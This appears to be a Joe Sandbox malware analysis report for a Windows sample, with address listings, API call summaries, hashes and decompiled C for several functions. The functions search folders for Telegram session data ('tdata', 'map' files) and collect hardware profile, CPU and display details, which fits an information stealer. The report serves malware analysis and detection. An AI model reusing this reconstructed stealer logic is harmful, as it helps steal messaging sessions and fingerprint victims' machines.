                                                  0x004018d8
                                                  0x004018db
                                                  0x004018dd
                                                  0x004018eb
                                                  0x004018f0
                                                  0x004018f4
                                                  0x004018f6
                                                  0x004018fc
                                                  0x004018ff
                                                  0x00401901
                                                  0x00401907
                                                  0x0040190a
                                                  0x0040190d
                                                  0x00401912
                                                  0x00401914
                                                  0x00401917
                                                  0x00401919
                                                  0x0040192d
                                                  0x0040192f
                                                  0x00401941
                                                  0x00401944
                                                  0x00401947
                                                  0x00401947
                                                  0x0040194b
                                                  0x00401955
                                                  0x00401964
                                                  0x00401969
                                                  0x0040196e
                                                  0x00401976
                                                  0x0040197b
                                                  0x0040197b
                                                  0x00401981
                                                  0x00401981
                                                  0x00401901
                                                  0x004018f6
                                                  0x00000000
                                                  0x004018dd
                                                  0x00401797
                                                  0x004017a2
                                                  0x004017a5
                                                  0x004017ac
                                                  0x004017af
                                                  0x004017b5
                                                  0x004017bd
                                                  0x004017c4
                                                  0x004017c8
                                                  0x004017ce
                                                  0x004017d3
                                                  0x00000000
                                                  0x004011ed
                                                  0x00401207
                                                  0x0040120f
                                                  0x004016c7
                                                  0x004016d1
                                                  0x004016de
                                                  0x004016e8
                                                  0x004016f7
                                                  0x004016fa
                                                  0x004016fc
                                                  0x00401706
                                                  0x0040170b
                                                  0x0040170d
                                                  0x00401713
                                                  0x00401724
                                                  0x0040172e
                                                  0x0040173c
                                                  0x0040173f
                                                  0x00401746
                                                  0x0040174b
                                                  0x0040174e
                                                  0x0040174e
                                                  0x0040170d
                                                  0x00000000
                                                  0x0040122d
                                                  0x00401233
                                                  0x004016a3
                                                  0x004016b4
                                                  0x004016bc
                                                  0x00000000
                                                  0x00401245
                                                  0x0040124b
                                                  0x004012e1
                                                  0x004012e7
                                                  0x0040138b
                                                  0x00401391
                                                  0x00401401
                                                  0x00401407
                                                  0x0040143e
                                                  0x00401444
                                                  0x0040144d
                                                  0x00401453
                                                  0x00401468
                                                  0x0040146e
                                                  0x00401652
                                                  0x00401652
                                                  0x0040165c
                                                  0x00401669
                                                  0x00401678
                                                  0x0040167b
                                                  0x0040167d
                                                  0x004013f5
                                                  0x004013f7
                                                  0x00000000
                                                  0x004013f7
                                                  0x00401687
                                                  0x0040168c
                                                  0x0040168e
                                                  0x00000000
                                                  0x00000000
                                                  0x00401694
                                                  0x00401696
                                                  0x004013c8
                                                  0x004013d2
                                                  0x004013d6
                                                  0x004013de
                                                  0x004013de
                                                  0x004013e6
                                                  0x004013e7
                                                  0x004013ec
                                                  0x004013ef
                                                  0x004013ef
                                                  0x004013ef
                                                  0x00000000
                                                  0x004013ef
                                                  0x00401474
                                                  0x0040147a
                                                  0x00000000
                                                  0x00000000
                                                  0x00401480
                                                  0x00401486
                                                  0x00000000
                                                  0x00000000
                                                  0x0040148c
                                                  0x00401492
                                                  0x00000000
                                                  0x00000000
                                                  0x00401498
                                                  0x0040149e
                                                  0x00000000
                                                  0x00000000
                                                  0x004014a4
                                                  0x004014aa
                                                  0x00000000
                                                  0x00000000
                                                  0x004014b0
                                                  0x004014b6
                                                  0x00000000
                                                  0x00000000
                                                  0x004014bc
                                                  0x004014c2
                                                  0x00000000
                                                  0x00000000
                                                  0x004014c8
                                                  0x004014ce
                                                  0x00000000
                                                  0x00000000
                                                  0x004014d4
                                                  0x004014da
                                                  0x00000000
                                                  0x00000000
                                                  0x004014e0
                                                  0x004014e6
                                                  0x00000000
                                                  0x00000000
                                                  0x004014ec
                                                  0x004014f2
                                                  0x00000000
                                                  0x00000000
                                                  0x004014f8
                                                  0x004014fe
                                                  0x00000000
                                                  0x00000000
                                                  0x00401504
                                                  0x0040150a
                                                  0x00000000
                                                  0x00000000
                                                  0x00401510
                                                  0x00401516
                                                  0x00000000
                                                  0x00000000
                                                  0x0040151c
                                                  0x00401522
                                                  0x00000000
                                                  0x00000000
                                                  0x00401528
                                                  0x0040152e
                                                  0x00000000
                                                  0x00000000
                                                  0x00401534
                                                  0x0040153a
                                                  0x00000000
                                                  0x00000000
                                                  0x00401540
                                                  0x00401546
                                                  0x00000000
                                                  0x00000000
                                                  0x0040154c
                                                  0x00401552
                                                  0x00000000
                                                  0x00000000
                                                  0x00401558
                                                  0x0040155e
                                                  0x00000000
                                                  0x00000000
                                                  0x00401564
                                                  0x0040156a
                                                  0x00000000
                                                  0x00000000
                                                  0x00401570
                                                  0x00401576
                                                  0x00000000
                                                  0x00000000
                                                  0x0040157c
                                                  0x00401582
                                                  0x00000000
                                                  0x00000000
                                                  0x00401588
                                                  0x0040158e
                                                  0x00000000
                                                  0x00000000
                                                  0x00401594
                                                  0x0040159a
                                                  0x00000000
                                                  0x00000000
                                                  0x004015a0
                                                  0x004015a6
                                                  0x004015da
                                                  0x004015da
                                                  0x004015e1
                                                  0x004015ee
                                                  0x004015fd
                                                  0x00401600
                                                  0x00401602
                                                  0x0040160c
                                                  0x00401611
                                                  0x00401613
                                                  0x00401626
                                                  0x00401636
                                                  0x00401639
                                                  0x0040163f
                                                  0x00401644
                                                  0x00401647
                                                  0x00401647
                                                  0x00401613
                                                  0x00000000
                                                  0x00401602
                                                  0x004015a8
                                                  0x004015ae
                                                  0x00000000
                                                  0x00000000
                                                  0x004015b0
                                                  0x004015b6
                                                  0x00000000
                                                  0x00000000
                                                  0x004015b8
                                                  0x004015be
                                                  0x00000000
                                                  0x00000000
                                                  0x004015c0
                                                  0x004015c6
                                                  0x00000000
                                                  0x00000000
                                                  0x004015cf
                                                  0x00000000
                                                  0x004015d4
                                                  0x00401455
                                                  0x00401459
                                                  0x0040145c
                                                  0x00000000
                                                  0x00401446
                                                  0x00401446
                                                  0x00000000
                                                  0x00401446
                                                  0x00401444
                                                  0x00401409
                                                  0x00401410
                                                  0x0040141a
                                                  0x00401426
                                                  0x00401429
                                                  0x0040142b
                                                  0x00000000
                                                  0x00000000
                                                  0x00401431
                                                  0x00401436
                                                  0x00401438
                                                  0x00000000
                                                  0x0040143a
                                                  0x0040143a
                                                  0x004013c6
                                                  0x004013c6
                                                  0x00000000
                                                  0x004013c6
                                                  0x00401438
                                                  0x00401393
                                                  0x0040139a
                                                  0x004013a4
                                                  0x004013b0
                                                  0x004013b3
                                                  0x004013b5
                                                  0x00000000
                                                  0x00000000
                                                  0x004013bb
                                                  0x004013c0
                                                  0x004013c2
                                                  0x00000000
                                                  0x004013c4
                                                  0x004013c4
                                                  0x00000000
                                                  0x004013c4
                                                  0x004012ed
                                                  0x004012ed
                                                  0x004012ed
                                                  0x004012ed
                                                  0x004012f1
                                                  0x004012f4
                                                  0x004012fb
                                                  0x004012fb
                                                  0x0040130a
                                                  0x0040130d
                                                  0x0040130f
                                                  0x0040137c
                                                  0x0040137e
                                                  0x00401383
                                                  0x00000000
                                                  0x00401383
                                                  0x00401315
                                                  0x0040131a
                                                  0x0040131c
                                                  0x0040132f
                                                  0x0040133a
                                                  0x0040133d
                                                  0x00401344
                                                  0x00401347
                                                  0x0040134d
                                                  0x00401355
                                                  0x00401361
                                                  0x00401363
                                                  0x00401367
                                                  0x0040136c
                                                  0x0040136f
                                                  0x0040136f
                                                  0x00401375
                                                  0x00401377
                                                  0x00401377
                                                  0x00000000
                                                  0x0040131c
                                                  0x00401251
                                                  0x00401251
                                                  0x00401253
                                                  0x00401263
                                                  0x0040126b
                                                  0x0040126e
                                                  0x00401273
                                                  0x00401274
                                                  0x00401279
                                                  0x0040127c
                                                  0x00000000
                                                  0x0040127c
                                                  0x0040124b
                                                  0x00401233
                                                  0x0040120f
                                                  0x00401285
                                                  0x0040128f
                                                  0x00401295
                                                  0x00000000
                                                  0x00401173

                                                  APIs
                                                  • FindNextFileW.KERNELBASE(?,?), ref: 0040128F
                                                    • Part of subcall function 0040402B: GetFileAttributesW.KERNELBASE(00F7E960,00401035,00F7E960), ref: 0040402C
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • FindFirstFileW.KERNELBASE(00000000,?,00F7E960), ref: 00401161
                                                  • EnterCriticalSection.KERNEL32(004084D4), ref: 004016A3
                                                  • LeaveCriticalSection.KERNEL32(004084D4), ref: 004016BC
                                                    • Part of subcall function 00403EAA: FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00403F0B
                                                    • Part of subcall function 00403EAA: FindNextFileW.KERNEL32(0040174B,?), ref: 00403FAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: File$CriticalFindSection$EnterFirstHeapLeaveNext$AllocateAttributesProcess
                                                  • String ID: $Lr$%s%s$%s\%s$%s\*$7a?=$Telegram
                                                  • API String ID: 1893179121-1537637304
                                                  • Opcode ID: fbf9d546b1d350cf1b97443c6fed3c3a637025945fa54ff0eb627fb59bd648e8
                                                  • Instruction ID: 38905c5577f4f7158907a1bc769050883fc1a5bf4532517a01263020584b9d64
                                                  • Opcode Fuzzy Hash: fbf9d546b1d350cf1b97443c6fed3c3a637025945fa54ff0eb627fb59bd648e8
                                                  • Instruction Fuzzy Hash: 71320771E0021597DB24ABA58C517BEB7B89F54314F18407FE806B72F1EB7C4E848B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404ABC Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 286fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 96%
                                                  			E00404ABC(void* __ecx, void* __edx, char _a4, intOrPtr _a8) {
				intOrPtr _v8;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				char _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				char _v100;
				void* _v104;
				struct _WIN32_FIND_DATAW _v700;
				short _t92;
				void* _t97;
				void* _t99;
				signed int _t102;
				int _t104;
				short _t105;
				short _t106;
				short _t107;
				short _t108;
				short _t109;
				short _t110;
				short _t116;
				short _t117;
				short _t123;
				short _t124;
				short _t125;
				short _t126;
				short _t127;
				signed int _t129;
				void* _t138;
				short _t141;
				short _t142;
				void* _t146;
				void* _t147;
				short _t149;
				short _t155;
				short _t168;
				short _t169;
				short _t170;
				short _t171;
				short _t175;
				short _t176;
				short _t177;
				short _t183;
				short _t185;
				short _t186;
				short _t187;
				short _t189;
				short _t190;
				short _t191;
				short _t192;
				short _t193;
				void* _t199;
				short _t200;
				WCHAR* _t202;
				void* _t203;
				void* _t204;
				void* _t205;
				intOrPtr _t209;

				_t207 = _a4 - 1;
				_t200 = 0x25;
				_t92 = 0x73;
				_t199 = __edx;
				_t147 = __ecx;
				_t183 = 0x74;
				_t149 = 0x61;
				if(_a4 != 1) {
					L3:
					 *0x4080bc =  *0x4080bc + 1;
					_v8 = E004034F0(0x208);
					_t202 = E004034F0(0x208);
					E004035E8(_t209, _t202, L"%s\\*", _t199);
					_t205 = _t204 + 0xc;
					_t97 = FindFirstFileW(_t202,  &_v700); // executed
					_v104 = _t97;
					_t210 = _t97 - 0xffffffff;
					if(_t97 == 0xffffffff) {
						L18:
						E0040351E(_t202);
						_t99 = E0040351E(_v8);
						 *0x4080bc =  *0x4080bc - 1;
						return _t99;
					} else {
						goto L4;
					}
					do {
						L4:
						_push( &(_v700.cFileName));
						E004035E8(_t210, _t202, L"%s\\%s", _t199);
						_t205 = _t205 + 0x10;
						if(_a4 != 0) {
							_t102 = E00403623( &(_v700.cFileName));
							_t155 = 0x73;
							__eflags =  *((intOrPtr*)(_t203 + _t102 * 2 - 0x28e)) - _t155;
							if(__eflags != 0) {
								goto L17;
							}
							_t105 = 0x25;
							_v60 = _t105;
							_t106 = 0x5c;
							_t185 = 0x74;
							_v56 = _t106;
							_t107 = 0x64;
							_v52 = _t107;
							_t108 = 0x61;
							_v50 = _t108;
							_v46 = _t108;
							_t109 = 0x5f;
							_v44 = _t109;
							_t110 = 0x25;
							_v54 = _t185;
							_v48 = _t185;
							_t186 = 0x64;
							_v42 = _t110;
							_v36 = _t110;
							_v32 = 0;
							_v40 = _t186;
							_t187 = 0x5c;
							_push( &(_v700.cFileName));
							_push( *0x4080b8);
							_v58 = _t155;
							_v38 = _t187;
							_v34 = _t155;
							E004035E8(__eflags, _v8,  &_v60, _a8);
							E00403E66(_t147, _t202, __eflags, _v8);
							_t116 = 0x25;
							_v28 = _t116;
							_t117 = 0x73;
							_t168 = 0x5c;
							_v24 = _t168;
							_t169 = 0x6d;
							_v22 = _t169;
							_t170 = 0x61;
							_v20 = _t170;
							_t171 = 0x70;
							_v26 = _t117;
							_v16 = _t117;
							_v18 = _t171;
							_v14 = 0;
							 *((short*)(_t202 + E00403623(_t202) * 2 - 2)) = 0;
							E004035E8(__eflags, _t202,  &_v28, _t202);
							_t205 = _t205 + 0x20;
							__eflags = E0040402B(_t202);
							if(__eflags == 0) {
								goto L17;
							}
							_t123 = 0x25;
							_v100 = _t123;
							_t124 = 0x73;
							_t175 = 0x5c;
							_t189 = 0x74;
							_v98 = _t124;
							_t125 = 0x64;
							_v96 = _t175;
							_t176 = 0x61;
							_v94 = _t189;
							_v88 = _t189;
							_t190 = 0x5f;
							_v84 = _t190;
							_t191 = 0x25;
							_v92 = _t125;
							_v80 = _t125;
							_t126 = 0x5c;
							_v78 = _t126;
							_t127 = 0x73;
							_v82 = _t191;
							_v76 = _t191;
							_t192 = 0x5c;
							_v72 = _t192;
							_t193 = 0x6d;
							_v90 = _t176;
							_v86 = _t176;
							_v68 = _t176;
							_t177 = 0x70;
							_v74 = _t127;
							_v64 = _t127;
							_v66 = _t177;
							_v70 = _t193;
							_v62 = 0;
							_t129 = E00403623( &(_v700.cFileName));
							__eflags = 0;
							 *((short*)(_t203 + _t129 * 2 - 0x28e)) = 0;
							_push( &(_v700.cFileName));
							_push( *0x4080b8);
							E004035E8(0, _v8,  &_v100, _a8);
							_t205 = _t205 + 0x14;
							E00403E66(_t147, _t202, __eflags, _v8);
							L16:
							goto L17;
						}
						if((_v700.dwFileAttributes & 0x00000010) != 0 && E00403713( &(_v700.cFileName), L"..") != 0 && E00403713( &(_v700.cFileName), ".") != 0) {
							_t138 = E00403B10( &(_v700.cFileName), E00403623( &(_v700.cFileName)) + _t136);
							if(_t138 == 0x23f2e218 || _t138 == 0x2d3640ab) {
								EnterCriticalSection(0x4084d4);
								E00404ABC(_t147, _t202, 1, L"Telegram");
								LeaveCriticalSection(0x4084d4);
								goto L17;
							} else {
								if( *0x4080bc > 2) {
									goto L17;
								}
								E00404ABC(_t147, _t202, 0, 0); // executed
								goto L16;
							}
						}
						L17:
						_t104 = FindNextFileW(_v104,  &_v700); // executed
					} while (_t104 != 0);
					goto L18;
				}
				_v26 = _t92;
				_t141 = 0x5c;
				_v24 = _t141;
				_t142 = 0x64;
				_v20 = _t142;
				_v12 = 0;
				_v28 = _t200;
				_v22 = _t183;
				_v18 = _t149;
				_v16 = _t183;
				_v14 = _t149;
				E004035E8(_t207, __edx,  &_v28, __edx);
				_t204 = _t204 + 0xc;
				_t146 = E0040402B(__edx);
				if(_t146 != 0) {
					 *0x4080b8 =  *0x4080b8 + 1;
					_t209 =  *0x4080b8;
					goto L3;
				}
				return _t146;
			}



































































































                                                  0x00404ac5
                                                  0x00404ace
                                                  0x00404ad1
                                                  0x00404ad4
                                                  0x00404ad6
                                                  0x00404ad8
                                                  0x00404adb
                                                  0x00404adc
                                                  0x00404b2d
                                                  0x00404b2d
                                                  0x00404b41
                                                  0x00404b4a
                                                  0x00404b52
                                                  0x00404b57
                                                  0x00404b62
                                                  0x00404b68
                                                  0x00404b6b
                                                  0x00404b6e
                                                  0x00404e18
                                                  0x00404e1a
                                                  0x00404e22
                                                  0x00404e27
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b74
                                                  0x00404b74
                                                  0x00404b7a
                                                  0x00404b82
                                                  0x00404b87
                                                  0x00404b8e
                                                  0x00404c4c
                                                  0x00404c53
                                                  0x00404c54
                                                  0x00404c5c
                                                  0x00000000
                                                  0x00000000
                                                  0x00404c64
                                                  0x00404c67
                                                  0x00404c6b
                                                  0x00404c6e
                                                  0x00404c71
                                                  0x00404c75
                                                  0x00404c78
                                                  0x00404c7c
                                                  0x00404c7f
                                                  0x00404c83
                                                  0x00404c87
                                                  0x00404c8a
                                                  0x00404c8e
                                                  0x00404c91
                                                  0x00404c95
                                                  0x00404c99
                                                  0x00404c9a
                                                  0x00404ca0
                                                  0x00404ca6
                                                  0x00404cb0
                                                  0x00404cb4
                                                  0x00404cb5
                                                  0x00404cb6
                                                  0x00404cbf
                                                  0x00404cc6
                                                  0x00404cce
                                                  0x00404cd2
                                                  0x00404ce1
                                                  0x00404ce9
                                                  0x00404cec
                                                  0x00404cf0
                                                  0x00404cf3
                                                  0x00404cf6
                                                  0x00404cfa
                                                  0x00404cfb
                                                  0x00404d01
                                                  0x00404d02
                                                  0x00404d08
                                                  0x00404d09
                                                  0x00404d0d
                                                  0x00404d13
                                                  0x00404d19
                                                  0x00404d25
                                                  0x00404d2f
                                                  0x00404d34
                                                  0x00404d3e
                                                  0x00404d40
                                                  0x00000000
                                                  0x00000000
                                                  0x00404d48
                                                  0x00404d4b
                                                  0x00404d4f
                                                  0x00404d52
                                                  0x00404d55
                                                  0x00404d58
                                                  0x00404d5c
                                                  0x00404d5f
                                                  0x00404d63
                                                  0x00404d66
                                                  0x00404d6a
                                                  0x00404d6e
                                                  0x00404d71
                                                  0x00404d75
                                                  0x00404d78
                                                  0x00404d7c
                                                  0x00404d80
                                                  0x00404d83
                                                  0x00404d87
                                                  0x00404d8a
                                                  0x00404d8e
                                                  0x00404d92
                                                  0x00404d95
                                                  0x00404d99
                                                  0x00404d9a
                                                  0x00404d9e
                                                  0x00404da2
                                                  0x00404da8
                                                  0x00404da9
                                                  0x00404dad
                                                  0x00404db3
                                                  0x00404dbd
                                                  0x00404dc1
                                                  0x00404dc5
                                                  0x00404dca
                                                  0x00404dcc
                                                  0x00404dda
                                                  0x00404ddb
                                                  0x00404deb
                                                  0x00404df0
                                                  0x00404dfa
                                                  0x00404dff
                                                  0x00000000
                                                  0x00404dff
                                                  0x00404b9b
                                                  0x00404be6
                                                  0x00404bf0
                                                  0x00404c1e
                                                  0x00404c2f
                                                  0x00404c3b
                                                  0x00000000
                                                  0x00404bf9
                                                  0x00404c00
                                                  0x00000000
                                                  0x00000000
                                                  0x00404c0e
                                                  0x00000000
                                                  0x00404c13
                                                  0x00404bf0
                                                  0x00404e00
                                                  0x00404e0a
                                                  0x00404e10
                                                  0x00000000
                                                  0x00404b74
                                                  0x00404ae0
                                                  0x00404ae4
                                                  0x00404ae7
                                                  0x00404aeb
                                                  0x00404aec
                                                  0x00404af2
                                                  0x00404afc
                                                  0x00404b00
                                                  0x00404b04
                                                  0x00404b08
                                                  0x00404b0c
                                                  0x00404b10
                                                  0x00404b15
                                                  0x00404b1a
                                                  0x00404b21
                                                  0x00404b27
                                                  0x00404b27
                                                  0x00000000
                                                  0x00404b27
                                                  0x00404e33

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,004084D4,?), ref: 00404B62
                                                  • EnterCriticalSection.KERNEL32(004084D4), ref: 00404C1E
                                                    • Part of subcall function 00404ABC: LeaveCriticalSection.KERNEL32(004084D4), ref: 00404C3B
                                                  • FindNextFileW.KERNELBASE(?,?), ref: 00404E0A
                                                    • Part of subcall function 0040402B: GetFileAttributesW.KERNELBASE(00F7E960,00401035,00F7E960), ref: 0040402C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: File$CriticalFindSection$AttributesEnterFirstLeaveNext
                                                  • String ID: %s\%s$%s\*$Telegram
                                                  • API String ID: 648860119-4994844
                                                  • Opcode ID: 1f8b838a5c4e27d725b3d0cebc7bbf837a7a7b2244d331cf3ba931f53252c21b
                                                  • Instruction ID: 46fb50b973a3c0d7301f33b4d2055fb4458c929e1c6fe611921c87e6bd73fcb7
                                                  • Opcode Fuzzy Hash: 1f8b838a5c4e27d725b3d0cebc7bbf837a7a7b2244d331cf3ba931f53252c21b
                                                  • Instruction Fuzzy Hash: D2A18325A14308A9EF10DBA0ED06BBE7775EF84710F20543FE504BB2E0EBB51A85879D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040202A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 120COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 502 40202a-40207b call 4034f0 505 4020d9-4020e6 GetCurrentHwProfileA 502->505 506 40207d-40209c 502->506 507 4020e8-4020f9 call 4035c3 505->507 508 4020fc-40213b GetSystemInfo call 4035c3 call 40351e 505->508 509 4020a4-4020aa 506->509 510 40209e-4020a2 506->510 507->508 524 402178-402189 EnumDisplayDevicesA 508->524 514 4020b5-4020bb 509->514 515 4020ac-4020b3 509->515 513 4020c4-4020cf call 403533 510->513 519 4020d2-4020d7 513->519 514->519 520 4020bd-4020c1 514->520 515->513 519->505 519->506 520->513 525 40218b-402191 524->525 526 40213d-402146 524->526 527 402167-402177 526->527 528 402148-402164 call 4035c3 526->528 527->524 528->527
                                                  C-Code - Quality: 59%
                                                  			E0040202A(char* __edx) {
				char _v392;
				char _v428;
				struct tagHW_PROFILE_INFOA _v556;
				struct _SYSTEM_INFO _v592;
				char _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				char _t32;
				int _t34;
				int _t39;
				char _t40;
				intOrPtr _t48;
				intOrPtr* _t50;
				intOrPtr _t60;
				char* _t62;
				intOrPtr _t64;
				void* _t66;
				void* _t70;
				intOrPtr* _t72;
				signed int _t73;
				void* _t75;
				void* _t76;

				_t62 = __edx;
				_t75 = (_t73 & 0xfffffff8) - 0x264;
				asm("movaps xmm0, [0x407520]");
				_push(_t48);
				asm("movups [esp+0x14], xmm0");
				_v616 = E004034F0(0x100);
				_t64 = 0x80000000;
				_push(_t48);
				asm("cpuid");
				_t50 =  &_v608;
				 *_t50 = 0x80000000;
				 *((intOrPtr*)(_t50 + 4)) = _t48;
				 *((intOrPtr*)(_t50 + 8)) = 0;
				 *((intOrPtr*)(_t50 + 0xc)) = __edx;
				_t32 = _v608;
				_v612 = _t32;
				if(_t32 >= 0x80000000) {
					do {
						_push(_t50);
						asm("cpuid");
						_t72 = _t50;
						_t50 =  &_v608;
						 *_t50 = _t64;
						 *((intOrPtr*)(_t50 + 4)) = _t72;
						 *((intOrPtr*)(_t50 + 8)) = 0;
						 *((intOrPtr*)(_t50 + 0xc)) = _t62;
						if(_t64 != 0x80000002) {
							__eflags = _t64 - 0x80000003;
							if(_t64 != 0x80000003) {
								__eflags = _t64 - 0x80000004;
								if(__eflags == 0) {
									_t60 = _v616 + 0x20;
									goto L7;
								}
							} else {
								_t60 = _v616 + 0x10;
								goto L7;
							}
						} else {
							_t60 = _v616;
							L7:
							_t62 =  &_v608;
							E00403533(_t60, _t62, 0x10);
							_t75 = _t75 + 4;
						}
						_t64 = _t64 + 1;
					} while (_t64 <= _v612);
				}
				_t34 = GetCurrentHwProfileA( &_v556); // executed
				_t80 = _t34;
				if(_t34 != 0) {
					E004035C3(_t80, 0, "- HWID: %s\r\n",  &(_v556.szHwProfileGuid));
					_t75 = _t75 + 0xc;
				}
				GetSystemInfo( &_v592); // executed
				_push(_v592.dwNumberOfProcessors);
				E004035C3(_t80, 0, "- CPU: %s (%d cores)\r\n", _v616);
				_t76 = _t75 + 0x10;
				E0040351E(_v616);
				_t70 = 0;
				_t66 = 1;
				_push(1);
				_push( &_v428);
				_push(1);
				while(1) {
					_v428 = 0x1a8;
					_t39 = EnumDisplayDevicesA(0, ??, ??, ??);
					if(_t39 == 0) {
						break;
					}
					_t40 = _v428;
					__eflags = _t70 - _t40;
					if(__eflags != 0) {
						_push( &_v392);
						E004035C3(__eflags, 0, "- VideoAdapter #%d: %s\r\n", _t66);
						_t40 = _v428;
						_t76 = _t76 + 0x10;
					}
					__eflags = _t70;
					_push(1);
					_t70 =  ==  ? _t40 : _t70;
					_t66 = _t66 + 1;
					__eflags = _t66;
					_push( &_v428);
					_push(_t66);
				}
				return _t39;
			}

























                                                  0x0040202a
                                                  0x00402030
                                                  0x00402036
                                                  0x00402042
                                                  0x00402045
                                                  0x0040204f
                                                  0x00402053
                                                  0x0040205c
                                                  0x0040205d
                                                  0x00402062
                                                  0x00402066
                                                  0x00402068
                                                  0x0040206b
                                                  0x0040206e
                                                  0x00402071
                                                  0x00402075
                                                  0x0040207b
                                                  0x0040207d
                                                  0x00402081
                                                  0x00402082
                                                  0x00402084
                                                  0x00402087
                                                  0x0040208b
                                                  0x0040208d
                                                  0x00402090
                                                  0x00402093
                                                  0x0040209c
                                                  0x004020a4
                                                  0x004020aa
                                                  0x004020b5
                                                  0x004020bb
                                                  0x004020c1
                                                  0x00000000
                                                  0x004020c1
                                                  0x004020ac
                                                  0x004020b0
                                                  0x00000000
                                                  0x004020b0
                                                  0x0040209e
                                                  0x0040209e
                                                  0x004020c4
                                                  0x004020c6
                                                  0x004020ca
                                                  0x004020cf
                                                  0x004020cf
                                                  0x004020d2
                                                  0x004020d3
                                                  0x0040207d
                                                  0x004020de
                                                  0x004020e4
                                                  0x004020e6
                                                  0x004020f4
                                                  0x004020f9
                                                  0x004020f9
                                                  0x00402101
                                                  0x00402107
                                                  0x00402117
                                                  0x0040211c
                                                  0x00402121
                                                  0x00402135
                                                  0x00402137
                                                  0x00402138
                                                  0x00402139
                                                  0x0040213a
                                                  0x00402178
                                                  0x0040217a
                                                  0x00402185
                                                  0x00402189
                                                  0x00000000
                                                  0x00000000
                                                  0x0040213d
                                                  0x00402144
                                                  0x00402146
                                                  0x0040214f
                                                  0x00402158
                                                  0x0040215d
                                                  0x00402164
                                                  0x00402164
                                                  0x00402167
                                                  0x00402169
                                                  0x0040216b
                                                  0x00402175
                                                  0x00402175
                                                  0x00402176
                                                  0x00402177
                                                  0x00402177
                                                  0x00402191

                                                  APIs
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 004020DE
                                                  • GetSystemInfo.KERNELBASE(?,?,?), ref: 00402101
                                                  • EnumDisplayDevicesA.USER32(00000000,00000002,?,00000001), ref: 00402185
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CriticalHeapSection$AllocateCurrentDevicesDisplayEnterEnumInfoLeaveProcessProfileSystem
                                                  • String ID: - CPU: %s (%d cores)$- HWID: %s$- VideoAdapter #%d: %s
                                                  • API String ID: 1497829079-3876982446
                                                  • Opcode ID: 4e531b95e6d30593aa1aa5d047c0dd94825ffea83d23737851f4064f67ae3138
                                                  • Instruction ID: 3c691ca1110b890ba953a104ca2fe17719c0a808786d04ab18a9e7f71232156c
                                                  • Opcode Fuzzy Hash: 4e531b95e6d30593aa1aa5d047c0dd94825ffea83d23737851f4064f67ae3138
                                                  • Instruction Fuzzy Hash: 4C41D1719083019BD720CF15CC85F6BB7E8EB84714F10893EFA49AB2C1E6759944CBA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401D2F Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 133fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
